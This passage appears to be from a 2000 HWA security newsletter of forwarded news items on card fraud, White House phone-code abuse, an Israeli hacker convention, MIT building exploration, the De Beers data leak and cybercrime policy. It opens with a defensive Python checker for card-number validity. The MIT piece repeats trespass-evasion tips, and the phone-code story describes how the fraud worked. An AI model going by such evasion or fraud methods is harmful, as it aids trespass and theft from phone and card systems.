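    return r["network"] is not None and r["length_ok"] and r["luhn_ok"]


if __name__ == "__main__":
    # Constructed samples: a standard Visa test number, the same with a bad
    # check digit, and a 12-digit placeholder resembling the article's case.
    for sample in ("4111 1111 1111 1111", "4111 1111 1111 1112", "1234 5678 9012"):
        print(sample, classify(sample), "plausible" if plausible(sample) else "bogus")
```

      A number failing any of the three checks is not proof of fabrication on
      its own (issuers do reuse and retire ranges), but a posted "card" that
      fails all three, as the one described above does, deserves no
      response beyond logging the claim.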
      
      A spokesperson for the U.S. Secret Service, which investigates credit
      card fraud, would not comment on Curador's claims, although he did say
      that the card appeared to be missing numbers.
      
      
      
      @HWA      
      
235.0 ISN:White house official charged with spreading phone codes
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      http://dailynews.yahoo.com/h/nm/20000327/tc/crime_whitehouse_1.html
      
      By Gail Appleson, Law Correspondent
      
      NEW YORK (Reuters) - A U.S. Army sergeant has been charged with giving
      out long distance White House telephone access code information that
      allowed individuals to charge some 9,400 calls worth $50,000 to the
      federal government, prosecutors said on Monday.
      
      David Gilmer, who was assigned to the White House Communications
      Agency, was arrested late Friday in Virginia on a criminal complaint
      filed in Manhattan federal court that alleged the calls were made over
      the last few months.
      
      The WHCA provides telephone service to Executive Branch agencies and
      departments including the President, Vice President, White House
      Senior Staff, National Security Council, U.S. Secret Service and
      others as directed by the White House Military Office.
      
      AT&T provides the long-distance phone service for the WHCA.
      
      No information was immediately available on the identities of those
      who used the information or if Gilmer made any profits from giving it
      out.
      
      The White House said Gilmer is no longer attached to the
      Communications Agency but had no further comment on the matter.
      
      Prosecutors said those involved in the scheme were able to use the
      White House code in much the same way consumers use telephone calling
      cards. However, in this case the WHCA was billed for the calls instead
      of the users.
      
      According to court papers, individuals called a WHCA toll-free number
      and entered a numerical code. They then heard a dial tone and were
      able to make long distance calls.
      
      AT&T told investigators that about 9,400 unauthorized calls were made
      between about Dec. 5, 1999, and Feb. 8. Some of these calls were made
      from phones in New Jersey and New York City. WHCA was billed about
      $50,000 for the calls.
      
      AT&T and Bell Atlantic provided authorities with subscriber
      information for several of the residential and business telephone
      lines on which the calls were made and search warrants were obtained
      for those properties.
      
      In searching one of the New Jersey properties, agents said that one
      individual admitted using the WHCA toll-free number and code since
      September 1999.
      
      The unidentified individual allegedly told authorities the information
      came from Gilmer. According to court papers, the individual had
      Gilmer's business card identifying him as an employee of the WHCA
      assigned to the Presidential Communications division.
      
      On March 17 the individual consented to be taped by federal agents
      when that individual called Gilmer. The individual asked Gilmer for
      another WHCA code to avoid being billed for a long distance call.
      Gilmer allegedly provided the code.
      
      The individual made a second taped call on March 22 and during the
      conversation Gilmer allegedly admitted giving access codes to other
      individuals.
      
      
      
      @HWA      
      
236.0 ISN:Hackers hold conference in Israel
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.lasvegassun.com/sunbin/stories/tech/2000/mar/30/033000707.html
      
      JERUSALEM (AP) [3.30.2000] -- Hackers from around the world overcame
      interrogations, censorship and an all-around bad image to hold
      Israel's first hacker convention, wrapping up the two-day conference
      Thursday without a glitch.
      
      The 350-strong gathering was the first of its kind since the Yahoo!
      and eBay commercial sites were crippled in February, reminding
      companies across the globe of the dangers hackers can pose.
      
      At the request of lawmakers, Israeli police had considered banning the
      conference, but Attorney General Eliyakim Rubinstein gave the
      go-ahead.
      
      One of the original hackers, John Draper of Fremont, Calif., said the
      hackers wanted to put a better face on the practice.
      
      "A hacker is a person who is developing programs to make them better,"
      Draper told The Associated Press. "They aren't the kind of people who
      break into computer systems. That's a cracker."
      
      Draper, known by the handle "Captain Crunch," helped launch the hacker
      phenomenon. In 1971, he discovered that a toy whistle from a cereal
      box reproduced the tone needed to open a free telephone line.
      
      Aware of his fame, Israeli security agents at the Los Angeles airport
      interrogated Draper for an hour, he said, and thoroughly searched his
      computer equipment before allowing him on the plane.
      
      "There were many attempts to silence us on this," organizers said in a
      summary of the gathering, released on their Web site.
      
      Police prevented the organizers from publishing one of the results of
      the conference: a list of vulnerable Israeli commercial Web sites.
      
      To compile the list, participants played "HackTheseSites" with sites
      offered up by Israeli companies. The site owners were confident no one
      could thwart them, but they were wrong.
      
      When they weren't eating pizza or guzzling soda, the hackers sat bent
      over their computer screens. They discovered that 28 percent of the
      Israeli net is vulnerable -- about the same proportion as the rest of
      the world, according to organizers.
      
      Police were invited to attend the conference and even to speak, but
      they turned down the offer, which gave rise to the game "Spot the Fed."
      
      Participants were given the challenge of finding plainclothes
      policemen among them. If a person pointed out as suspicious was in
      fact a security official, the official was to get an "I am the FED"
      T-shirt, and the spotter an "I spotted the FED" shirt. But none were
      found out.
      
      Israeli lawmaker and former Science Minister Michael Eitan accepted an
      invitation to attend. He said that hacker games like those displayed
      at the conference were meant more to entertain ambitious youngsters
      than cause harm.
      
      "I told them that as long as they all enjoy the freedom of the
      Internet and don't abuse this freedom, and make the public support
      police intervention, this will work," Eitan said in a telephone
      interview.
      
      Participants also got to speak to their guru -- convicted cyberbandit
      Kevin Mitnick -- in a conference call. The 36-year-old American
      bemoaned the strict probation terms that ban him from using a computer
      or any hi-tech device.
      
      Mitnick was released last year after serving five years in jail for
      breaking into the computer systems of some of America's biggest
      companies, including Motorola Inc., Novell Inc. and Sun Microsystems
      Inc.
      
      "He had a lot of sympathy in the room -- we all know not being able to
      touch a computer is a worse punishment than even being in jail," said
      Neora Shaul, a Tel Aviv computer programmer who helped coordinate the
      conference.
      
      --
      
      On the Net: Conference organizers at http://www.neora.com
      John Draper's site at http://www.webcrunchers.com
      Hackers' site at http://www.y2hack.com
      
      
      
      @HWA            
      
237.0 ISN:Old school MIT stylie "hacking" still makes news?
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.boston.com/dailyglobe2/090/metro/_Hackers_skirt_security_in_late_night_MIT_treks+.shtml
      
      By David Abel, Globe Correspondent, 3/30/2000
      
      CAMBRIDGE - Like shadows they scurry through the night, dressed in
      black, armed with head-mounted flashlights, walkie-talkies, ropes,
      pocketknives, lock-picking tools - and their student ID cards.
      
      They call themselves ''hackers.'' But these Massachusetts Institute of
      Technology students shouldn't be confused with those who sabotage
      computers. They have a more lofty goal: to bypass locked doors, slide
      through off-limits shafts and tunnels, and explore the bowels of
      campus buildings.
      
      Most Saturday nights, groups of less than a dozen students seek
      adventure by searching for anything from the fabled bricked-in shower
      to the Tomb of the Unknown Ladder.
      
      ''It's a lot like rock climbing or caving,'' said Jeremy Brown, 27, a
      computer science graduate student and veteran hacker. ''For us, it's
      about interrogating the environment, and learning from it.''
      
      But there's another, less appealing side of hacking: the danger. Last
      November a student was seriously injured after falling through a roof.
      
      Many of the hundreds of hackers are reluctant to talk about their
      underground pastime. They fear news reports will only push college
      officials to clamp down. ''You see, the more detail we give,'' Brown
      said, ''the more we're shooting ourselves in the foot.''
      
      Still, hacking is anything but a secret at MIT. If they haven't done
      it themselves, almost any student on campus could name a friend who
      has. In fact, during freshman orientation week every year,
      upperclassmen take large groups to tour the innards of MIT's
      infrastructure.
      
      But college officials insist that they don't turn a blind eye to what
      is known as ''roof and tunnel hacking,'' a variation on, or sometimes
      a precursor to, another form of hacking: practical jokes. MIT students
      are famous for inventive pranks that require engineering finesse and
      are often done to coincide with April Fools' Day, such as placing a
      replica of a campus police cruiser atop the school's Great Dome.
      
      ''We definitely don't encourage it,'' said Lawrence S. Bacow,
      chancellor of MIT. ''We lock the roofs, we alarm doors, and we have
      fined students when they're where they shouldn't be. It's certainly
      not like we say, `Here's a roof; come climb on it.' Far from it.''
      
      With students routinely ignoring ''no entrance'' signs, groping their
      way through unlit pipe rooms, boiler tunnels, and high-voltage areas
      meant only for specially trained maintenance crews, safety has long
      concerned administrators.
      
      But the culture of hacking recently has come under increased scrutiny.
      About 3 a.m. on a Sunday morning in November, an 18-year-old woman
      plunged 96 feet down a chimney. The freshman from Pennsylvania, whose
      name MIT won't release, is recovering from major spinal cord injuries
      after falling off the roof of the Sloan School of Management building.
      
      While administrators say the student's injury is the worst hacking
      accident in memory, they know the college was very close to having a
      fatality - and they say they're doing everything in their power to
      stop it.
      
      ''One injury is one injury too many,'' Bacow said. ''We took this very
      seriously. She could have died - easily. She was lucky.''
      
      Even with fines of up to $500 for trespassing, improved locks and
      alarm systems, and constant admonishing by administrators, MIT hackers
      are not daunted. If anything, they say, they see the obstacles as a
      challenge to be overcome.
      
      ''A lot of hacking is about creativity, finding a way around a locked
      door or something,'' said a 22-year-old senior majoring in biology,
      who used to hack and asked that she not be identified. ''Hackers are
      generally students who question authority and don't pay attention to
      rules.''
      
      Yet hackers insist they consider safety paramount. Before taking out
      novices, usually recently recruited freshmen, they pass out laminated
      yellow cards titled, ''Hacking Ethics.'' The cards are also used as a
      way to open doors.
      
      The pithy precepts include: ''Don't drink and hack;'' ''Don't hack
      alone;'' ''Leave no permanent damage;'' ''Be subtle - leave no
      evidence that you were there;'' and contrarily, ''Don't steal
      anything, but if you must borrow something, remember to return it -
      perhaps leave a note saying when it will be returned.''
      
      But risks rise when hackers obey their 11th Commandment: Don't Get
      Caught. According to ''A Brief Guide to Hacking,'' part of a pamphlet
      published by MIT's Technology Communication Association and circulated
      to incoming freshmen, hackers ''shalt honor [the commandment] and keep
      it wholly.''
      
      After detailing specific evasion tactics - such as, ''always have two
      ways to run,'' or when fleeing, ''change floors often'' - the guide
      offers up these alibis if caught: ''Is this the way to Baker House?''
      or ''Where's the nearest bathroom?''
      
      Rarely, however, do students get caught in such a bind. According to
      MIT campus police, fewer than a dozen students a year are cited for
      hacking. Yet on any given night, as many hackers may be trolling
      through the Earth, Atmospheric, and Planetary Sciences building or the
      domes towering above the Infinite Corridor.
      
      ''It's a difficult thing to prevent,'' said Anne Glavin, chief of
      MIT's police force. ''First, this subculture is made up of secret
      associations, and they're not exactly inviting us in as guest
      speakers. The other thing is these are some of the brightest students.
      Staying ahead of them is a challenge. I mean, they are the ones who
      are going to be building the security systems in the future.''
      
      The phenomenon of students scoping steam tunnels or climbing through
      air ducts for fun reveals the peculiar environment of grouping some of
      the nation's smartest science-oriented students, administrators and
      alumni say.
      
      At the elite institution, where many of the students grow up taking
      pleasure more from solving a quadratic equation than in things like
      watching Sunday football, students often are eager to craft their own
      brand of entertainment.
      
      Throw in a dollop of curiosity and a bent toward ingenuity and you
      come up with students interested in hacking, according to Jeff Bigler,
      the former president of MIT Spelunkers club and now an alumnus who
      helps chronicle hackers' practical jokes.
      
      ''Really, what it comes down to is it's a way to hang out, and beats
      drinking beer and bad music,'' Bigler said. ''It's just exploring,
      hanging out together and having fun. It's like an outing club.''
      
      
      *-------------------------------------------------*
      "Communications without intelligence is noise;
      Intelligence without communications is irrelevant."
      Gen. Alfred. M. Gray, USMC
      ---------------------------------------------------
      C4I Secure Solutions             http://www.c4i.org
      *-------------------------------------------------*
      
      @HWA          
      
238.0 ISN:US Census tests security
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.fcw.com/fcw/articles/2000/0327/web-1census-03-27-00.asp
      
      Census tests security
      
      By Judi Hasson
      03/27/2000
      
      The Census Bureau has hired a company to try to break into its
      Internet site and brought in the super-secret National Security Agency
      to test Census security systems.
      
      Census officials said they are certain the data is safe but want to
      make sure there are no vulnerable spots.
      
      "Every day, people are scanning our ports. It's not just our site. It's
      any site," said J. Gary Doyle, who is responsible for systems
      integration at the Census Bureau.
      
      Among the steps that the Census Bureau has taken to protect the
      decennial count:
      
           * Hiring the technology firm Science Applications International
             Corp. to try to break into the Census Internet site, where
             respondents can file online. SAIC began working last week,
             and there have been no reports of successful entry into the
             site.
      
           * Enlisting NSA to make sure the site is secure.
      
           * Erecting firewalls to prevent penetration. Among the
             precautions: prohibiting e-mail from entering the site
             unless there is a specific address on it and barring
             outside computers from dialing up the census computer
             in the building.
      
           * Encrypting all census data from the time it leaves a data
             scanning center via a secure telephone line until it arrives
             at the Census computer center in Bowie, Md.
      
           * Making three copies of the data and storing it in different
             vaults.
      
           * Providing backup systems at the Bowie computer center,
             including generators and air conditioners.
      
      The Census Bureau's precautions have gotten high marks from security
      experts inside and outside government.
      
      "Census is using all of the proper security practices," said Richard
      Smith, vice president of federal operations at Internet Security
      Systems Inc. "I would guess the likelihood of someone getting in is
      small."
      
      
      
      ISN is sponsored by SecurityFocus.com
      
      @HWA            
      
239.0 ISN:Visa program targets online fraud
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Forwarded From: darek.milewski@pl.pwcglobal.com
      
      Visa program will target online fraud
      By Rachel Konrad
      Staff Writer, CNET News.com
      March 24, 2000, 1:10 p.m. PT
      URL: http://news.cnet.com/category/0-1007-200-1583717.html
      
      Online retailers will soon receive a list of formal recommendations from
      Visa aimed at helping merchants crack down on fraud. 
      
      Visa's "best-practices" guide, which will be released within the next
      several weeks, will be similar to those the credit card giant has created
      for catalog companies that accept credit cards by mail or telephone
      without signatures. But the newest guide will target e-commerce companies
      for the first time, with tips on how to minimize hacker attacks on
      databases and spot potentially fraudulent orders before products are
      shipped. 
      
      "Internet merchants haven't always come out of the old catalog business,
      and sometimes they have little experience in business," said Dave Richey,
      vice president for card operations at Visa. "They're often new and often
      focused on IPOs and other stuff. Communication between merchant and
      cardholder is key in avoiding misunderstandings." 
      
      For some e-tailers, Visa's security tips could be considered a case of
      "better late than never": Credit card fraud has marred several
      high-profile and relatively established online companies in recent months. 
      
      Expedia, Microsoft's online travel affiliate, announced earlier this month
      that it will record a fiscal third-quarter charge of $4 million to $6
      million to cover the cost of fraudulent transactions on its Web site. The
      Bellevue, Wash.-based company said stolen credit cards were used to book
      travel reservations. 
      
      In January, nearly 350,000 credit card numbers were stolen from music site
      CD Universe and posted online. A hacker going by the name "Maxus" claimed
      to have the numbers and tried to extort $100,000 from the Web site. 
      
      The focus on credit card fraud coincides with intense scrutiny of
      e-commerce companies by Wall Street investors, many of whom worry that
      security breaches could dent revenue. 
      
      Unlike credit card transactions at brick-and-mortar companies, in which
      the bank that issued the card is usually liable for fraudulent
      transactions, online merchants are typically forced to cover the losses. 
      
      The financial institution that issues a credit card assumes liability in
      about 75 percent of all fraudulent transactions, according to John
      Shaughnessy, senior vice president for risk management at Visa. But in
      "card-not-present" transactions--when transactions happen by mail,
      telephone or Internet and no signatures are obtained--merchants assume
      liability for roughly 90 percent of fraudulent transactions. 
      
      Although it's impossible to quantify how much money online merchants have
      lost to fraudulent charges, experts say the total as a percent of revenue
      is anywhere from 1 percent to 30 percent, depending on the retailer and
      industry. In general, computer and electronics vendors are more at risk
      for fraud than vendors of less-expensive items, such as books, videos or
      CDs. 
      
      "Security is going to be the critical issue," said Ben Sim, an expert on
      e-commerce for New York-based C.E. Unterberg Towbin. "A lot of these
      merchants don't understand the implications of fraud, and they're using
      home-grown solutions that simply don't work. If you're getting someone
      from Romania ordering $50,000 of books, the fraudulent transaction's not
      going to happen. But thieves are getting much more sophisticated, and
      merchants' security systems aren't necessarily getting better." 
      
      According to an Unterberg Towbin study in 1998, more than 50 percent of
      disputed (or potentially fraudulent) charges at the Visa European division
      came from Internet transactions. However, Net transactions represented
      only 2 percent of the division's total transaction volume. 
      
      Although many e-commerce executives downplay fraud, their attorneys and
      accountants don't. 
      
      "Security breaches that result in access to confidential information could
      damage our reputation and expose us to a risk of loss or liability," music
      retailer CDNow stated in a 10K filed with the Securities and Exchange
      Commission in 1998. "We may be required to make significant expenditures
      and expend considerable personnel effort to protect against security
      breaches or remedy problems caused by these breaches. We cannot assure
      that our security measures will prevent such breaches." 
      
      Other companies are even more blunt: 
      
      "We cannot assure you that our security measures will prevent security
      breaches, and such breaches could expose us to operating losses,
      litigation and possible liability," read a 10Q filed by Egghead.com last
      November. 
      
      Amazon.com stated in a fall 1999 10Q filing: "Computer viruses, physical
      or electronic break-ins, and similar disruptions could cause system
      interruptions, delays and loss of critical data and could prevent us from
      providing services and accepting and fulfilling customer orders. 
      
      "Although we have developed systems and processes to mitigate fraudulent
      credit card transactions, failure to prevent such fraud may impact our
      financial results." 
      
      Tom Holland, director of fraud detection and prevention for Amazon, said
      such warnings are worst-case scenarios, not daily concerns. 
      
      "Amazon's fraud losses in comparison to sales revenues--it's minuscule," 
      Holland said. "I can't tell you the dollar figure. It's large, but as a
      percentage of sales, it's insignificant." 
      
      Holland said the company is continually upgrading its security system and
      cooperating with law enforcement to tackle fraud. Amazon and the sheriff
      of Fairhope, Ala., just completed a case in which a ring of thieves were
      using card numbers secured from an online "hack shack" of credit card
      numbers to buy books. 
      
      "They'd go to a house for sale, rip down the for-sale sign, and have
      deliveries go there," Holland said. "They took us for $3,000, but we're
      getting it all back." 
      
      Although online credit card fraud can damage retailers, security experts
      say, Internet transactions are extremely safe for consumers. 
      
      Consumers whose cards are used fraudulently online rarely are responsible
      for the bills because they don't sign a receipt. In the physical world,
      consumers must pay up to $50 of fraudulent transactions if they fail to
      report a stolen card or carelessly distributed credit card information. 
      
      "The people who end up eating it are the merchants," said Paul Wasserman,
      chief executive of Internet shopping portal Ebates.com and a former
      high-tech crime prosecutor in Silicon Valley. "If you're a merchant
      exercising due diligence, you're supposed to be off the hook. But the
      reality is that most of the financial institutions don't let them off." 
      
      Many e-commerce executives complain of an adversarial relationship with
      issuing banks. Holland said that often, when Amazon calls banks to verify
      addresses, the company doesn't get help. 
      
      "They can be blasé," Holland said of the issuing banks. "The e-commerce
      companies don't get any respect. We're Rodney Dangerfield." 
      
      
      @HWA            
      
240.0 ISN:GAO lists security bargains
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.fcw.com/fcw/articles/2000/0327/web-cheap-03-30-00.asp
      
      BY Diane Frank
      03/30/2000
      
      Agencies can cut their information systems security risks with
      low-cost and no-cost solutions, federal experts told Congress
      Wednesday.
      
      The General Accounting Office listed six steps that agencies can take
      to immediately cut down on their security risks:
      
      * Increase security awareness throughout the organization.
      * Ensure that existing controls are operating effectively.
      * Ensure that software patches are up-to-date.
      * Use automated scanning and testing tools to quickly identify
        vulnerabilities.
      * Expand the use of best practices throughout the agency.
      * Ensure that the most common vulnerabilities are addressed.
      
      In its security audits of agencies, including the departments of
      Defense and Veterans Affairs, GAO found that security controls are in
      place but that those controls are not being used correctly, said Jack
      Brock, director of governmentwide and defense information systems at
      the General Accounting Office's Accounting and Information Management
      Division.
      
      "Agencies are spending money for tools, but they're not using those
      tools," Brock testified before the House Government Reform Committee's
      Government Management, Information and Technology Subcommittee. "Tools
      are present, but they're not turned on, they're not monitored, you're not
      sure if they're working or not."
      
      One agency that has incorporated many of GAO's low-cost solutions into
      its agencywide security policy is NASA, which has made many
      improvements in security since its GAO audit in 1998, Brock said.
      
      The agency has bought commercial off-the-shelf vulnerability analysis
      and scanning tools, but it is augmenting them with freeware and
      shareware tools from the Internet. NASA also has developed and
      distributed a list of its top 50 vulnerabilities and has built those
      into auditing tools at NASA centers so that they automatically scan
      for those weaknesses, testified David Nelson, NASA's deputy chief
      information officer.
      
      Related link: Text of GAO's Congressional testimony on Wednesday
      
      http://www.gao.gov/new.items/ai00135t.pdf
      
      
      
      
      
      @HWA            
      
241.0 ISN:DeBeers leaks customer info
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://news.cnet.com/news/0-1007-200-1639327.html?tag=st.ne.1002.thed.1007-200-16393271007-200-1639327
      
      By Stefanie Olsen
      Staff Writer, CNET News.com
      April 4, 2000, 4:45 p.m. PT
      
      On the Web, diamonds can be a spammer's best friend.
      
      About 35,000 customer email and home addresses were exposed on
      adiamondisforever.com, an informational site about diamonds sponsored
      by De Beer's, CNET News.com has learned.
      
      Chad Yoshikawa, a Bay Area consultant, stumbled across the security
      hole today while searching for his home address through a search
      engine. The results turned up a little more than he bargained for.
      
      A Web page he found, pulled from the De Beer-sponsored site, lists the
      names, phone numbers, home and email addresses of people registered
      with the site, along with his own. Yoshikawa, who said his wife
      entered a diamond contest through the site, contacted a site
      administrator immediately because "it didn't look like they were too
      on top of things because it was hard to find the privacy policy."
      
      Jim Greene, system administrator for hosting company Luminant, replied
      in the email to Yoshikawa: "We have investigated and fixed the problem
      with the site. This area is not active on the site any longer."
      
      The security breach resembles several related "data spills" from Web
      sites. Last year, Butterball published the names and addresses of
      people who signed up to receive recipes via an online newsletter.
      Nissan also exposed a list of more than 24,000 email addresses of its
      potential buyers last year.
      
      "This kind of occurrence is all too frequent. (But) the De Beer's
      seems especially troublesome because it suggests access to high-net
      individuals," said Jason Catlett, president of Junkbusters, an online
      advocacy group.
      
      "Who knows how many people have noticed or downloaded the list before
      it came to the attention of the media," Catlett said.
      
      Greene said Yoshikawa and CNET News.com were the only ones to spot the
      file.
      
      "We have looked into the server logs and see no indications that
      anyone besides yourself and someone coming from C-Net accessed the
      files," he wrote.
      
      Adiamondisforever.com, which launched in November 1996, is part of The
      Diamond Information Center (DIC), a marketing service for De Beer's,
      one of the largest diamond producers and marketers in the world.
      
      The site's privacy policy stipulates that the company does not "make
      available the email addresses of those who access our site to other
      organizations or companies."
      
      
      
      @HWA            
      
242.0 ISN:Cybersleuths want to hack bill of rights
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2000/04/05/ED11338.DTL&type=tech_article
      
      JAMES P. PINKERTON, Newsday
      Wednesday, April 5, 2000
      (c) 2000 San Francisco Chronicle
      
      More than ever before, Americans are exercising their unalienable
      right to life, liberty and the pursuit of capital gains. But what
      happens when liberty jeopardizes life -- or the Dow Jones average? And
      what happens when the government jeopardizes liberty?
      
      On Tuesday, Sen. Jon Kyl, R-Ariz., convened the Senate Judiciary
      Subcommittee on Technology, Terrorism and Government Information to
      make the case for new legislation to protect the nation's
      ``information infrastructure.''
      
      And so began a familiar Washington ritual: Friendly lawmaker invites
      friendly bureaucrat to a hearing. Soon, a new law emerges that gives
      political credit to the lawmaker and a bigger budget to the
      bureaucrat. Kyl began the show with a declaration that ``denial of
      service'' hacker attacks on companies such as eBay, Yahoo and CNN
      should ``serve as a wake-up call about the need to protect our
      critical computer networks.'' Kyl added that ``the attacks contributed
      to a 258-point drop in the Dow Jones Industrial Average and halted a
      string of three days of consecutive record-high closes of the
      technology-laden Nasdaq Composite Index.''
      
      To deal with this problem, Kyl and Sen. Charles Schumer, D-N.Y., have
      co-sponsored S. 2092, which would modify the federal government's
      ``trap and trace'' authority, so that law enforcers would no longer
      need to obtain a search warrant in every jurisdiction through which a
      cyber-attack traveled.
      
      The first ``witness'' was FBI Director Louis Freeh. After praising Kyl
      and his legislation, he reminded his audience of how much the FBI was
      already doing to combat the scourge of cyber-crime. Freeh then used
      the forum to outline the FBI's entire cyber-agenda, covering everyone
      from virus-writers and intellectual property thieves to the ``Internet
      Black Tigers,'' a group ``reportedly affiliated with the Tamil
      Tigers'' of Sri Lanka. He further noted that unchecked Net-related
      stock fraud costs investors $1 million an hour.
      
      Only two more witnesses came after Freeh. One was Richard D. Pethia,
      who directs a federally funded cyber-security center within the
      Software Engineering Institute at Carnegie Mellon University in
      Pittsburgh. Not surprisingly, Pethia was 100 percent behind the joint
      Kyl-Freeh effort. The other witness was Harris N. Miller, president of
      the Information Technology Association of America, a Washington-based
      trade association. Miller was supportive but ambivalent; his worry
      seemed to be that high-tech trade secrets would spill into -- and then
      out of -- Uncle Sam's databases.
      
      But the real opposition to the Senate bill wasn't heard from
      because it wasn't invited to testify.
      
      One likely opponent is the Electronic Privacy Information Center, a
      Washington-based cyber-liberties group. ``This is very much a process
      being driven by the law-enforcement community,'' lamented Mark
      Rotenberg, the group's director.
      
      Another non-invitee was Solveig Singleton, director of information
      studies at the Cato Institute, a libertarian think tank in Washington.
      ``Law enforcement views the Fourth Amendment as the problem,'' she
      said. That's the piece of the Bill of Rights that protects ``persons,
      houses, papers and effects against unreasonable searches and
      seizures'' -- with no mention of e-mail. And so now, Singleton
      observed, the FBI wants to force manufacturers to ``build surveillance
      into technology,'' all but eliminating the need for search warrants.
      
      The dangers that Kyl and Freeh described are real, but so is the
      danger of a government's habitually stomping on privacy rights.
      History proves that basic rights are unalienable only when those who
      might alienate them are watched.
      
      
      
      @HWA            
      
243.0 ISN:Third laptop gets lifted
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.the-sun.co.uk/news/5631664
      
      By JOHN KAY
      
      A SENIOR Army officer has had a laptop computer stolen from under his
      nose - the THIRD theft of sensitive files in a month.
      
      The 50,000-a-year (U.K.P.) lieutenant colonel fell victim to an
      opportunist thief at Heathrow Airport.
      
      Military top brass admitted last night the incident was "incredibly
      embarrassing".
      
      And they said that the soldier was facing an internal disciplinary
      probe. The robbery followed the loss of two security service laptops -
      one from an MI5 agent at a London Tube station and one from a drunken
      MI6 officer.
      
      After those thefts were revealed exclusively by The Sun, all
      Government departments were ordered to tighten precautions against
      crooks out to snatch computers.
      
      [...]
      
      
      @HWA            
      
244.0 ISN:Government suck rocks at busting computer criminals
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://news.cnet.com/news/0-1005-200-1648223.html
      
      By The Associated Press
      Special to CNET News.com
      April 6, 2000, 10:05 a.m. PT
      
      STANFORD, Calif.--Threats from cyberterrorists have become almost
      routine at Oracle, the leading developer of database software.
      
      Last month, someone in Sudan tried to blackmail the Redwood Shores,
      Calif.-based company with a threat to break into its system unless it
      paid an undisclosed sum of money.
      
      A clear case for the FBI? Not at Oracle--or at hundreds of other
      high-tech victims of Internet cyberstalking.
      
      "We've notified them of a couple of threats, but we didn't expect them
      to take any action," said Bill Maimone, Oracle's vice president of
      server technologies. "It seems so unlikely that they'd be able to do
      something."
      
      As high-tech executives know, the Justice Department lacks the staff
      to investigate and prosecute most hackers. Many companies also are
      reluctant to undergo government scrutiny; they've got too many
      secrets.
      
      As a result, cybercriminals are breaking into or paralyzing Web sites
      with little fear of retribution, costing the industry hundreds of
      millions of dollars.
      
      At a Stanford University Law School conference on cybercrime
      yesterday, Attorney General Janet Reno pleaded for greater cooperation
      between the private and public sectors.
      
      "It seems to me that we all have a common goal--to keep the nation's
      computer network secure, safe and reliable," Reno told the assembled
      CEOs and prosecutors.
      
      Many company leaders were unconvinced.
      
      "High-tech businesses know they can't count on the Justice Department
      to handle their complaints," said John Palafoutas, a senior vice
      president of the American Electronics Association. "They know they
      must take care of their own security."
      
      For the past four years, the Clinton administration has asked Congress
      for additional staff to prosecute computer crime. To date, the answer
      has been a consistent refusal. There was just one cybercrime
      prosecution for every 50 private industry complaints in 1998,
      according to the latest Justice Department figures.
      
      "We're only able to respond to a limited number of the complaints we
      receive because we're starved for resources," said Associate Deputy
      Attorney General John Bentivoglio.
      
      While funding for prosecutors remains static, computer crime has
      quadrupled over the past three years, according to a survey by the FBI
      and San Francisco's Computer Security Institute.
      
      Of the hacking victims--most often corporations and government
      agencies--75 percent said it cost an average of $1 million per
      intrusion to investigate, repair and secure their systems.
      Corporations spent $7.1 billion in 1999 on security to protect
      themselves against cyberattacks, and the bill could reach $17 billion
      by 2003, according to Internet analysts at Aberdeen Group in Boston.
      
      Hackers know authorities are overwhelmed.
      
      Two months have passed with no arrests in the Feb. 8 electronic
      assault that crippled Web sites at 10 major computer companies,
      including Silicon Valley powerhouses eBay, Yahoo and E*Trade.
      
      eBay, an Internet auction site with more than 4.1 million items up for
      sale at any given time, fights a constant battle against hacking,
      fraud and illegal deals.
      
      "We only take the most serious matters to the FBI. They investigated a
      few, but there haven't been any prosecutions," said eBay's general
      counsel, Robert Chesnut. "If the government is going to come out and
      vow action in these sorts of cases, they need to provide resources,
      not just the promises."
      
      Companies such as eBay and Oracle rely on the help of private
      consultants to combat hackers--a decision that also helps keep their
      problems from being publicized.
      
      "Information-sharing is a risky proposition with less than clear
      benefits," said Harris Miller, president of the Information Technology
      Association of America. "Companies are understandably reluctant to
      share sensitive proprietary information about prevention practices,
      intrusions and actual crimes with either government agencies or
      competitors."
      
      
      
      @HWA      
      
245.0 CanSecWest/core00 Canadian Security Conf
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Unfortunately it's out west and not here (southern Ont/Toronto); it's what I
      was hoping to achieve with the failed CanCon (maybe we'll try it again
      with better planning this time and, like, oh I dunno, SPONSORS? money sorta
      helps heh.) anyway ... I know Dragos has promo'd this to death but here's
      the details :)
      
      
      April 7, 2000
      
      CanSecWest/core00
                
      The CanSecWest/core2000 Conference is being held May 10-12th in Vancouver,
      BC, Canada. Featured speakers include Ken Williams from Ernst and Young,
      rain.forest.puppy from wiretrip.net and Fyodor, the author of nmap, from
      insecure.org.
      
      http://www.dursec.com/
      
      CanSecWest/core00
      May, 10th, 11th, 12th, 2000
      Vancouver, BC, Canada.

       "Every IT/Security person who can attend, should attend. CanSecWest/core00 
       promises to be the hardest hitting, most informative, and useful network 
       security event ever held in Canada." (Sounds familiar eh?)
      
       CanSecWest is the first in the core00 series of security tutorials. It assumes
       a basic understanding of computing and is targeted at IT staff and managers who
       require a "crash" course on advanced computer security. If you administer
       servers you -need- this knowledge to put yourself on an even footing with your
       aggressors.
      
       Our goal is to arm our attendees with the basic core set of skills to create, 
       defend, and audit secure computer and server installations.
      
       This 2.5 day intensive training seminar will cover the most important modern 
       security issues facing e-commerce, networking, and system administration with 
       expert talks from some of the most noted and famous knowledgeable network 
       security "sensei" in the world.  This is your training academy for dealing with 
       the network intruders trying to prey on your computer - maybe even right now.
      
      
      
                              "Find out how they break in, how to stop them, and what 
                              they can do to try to evade you."
      
      
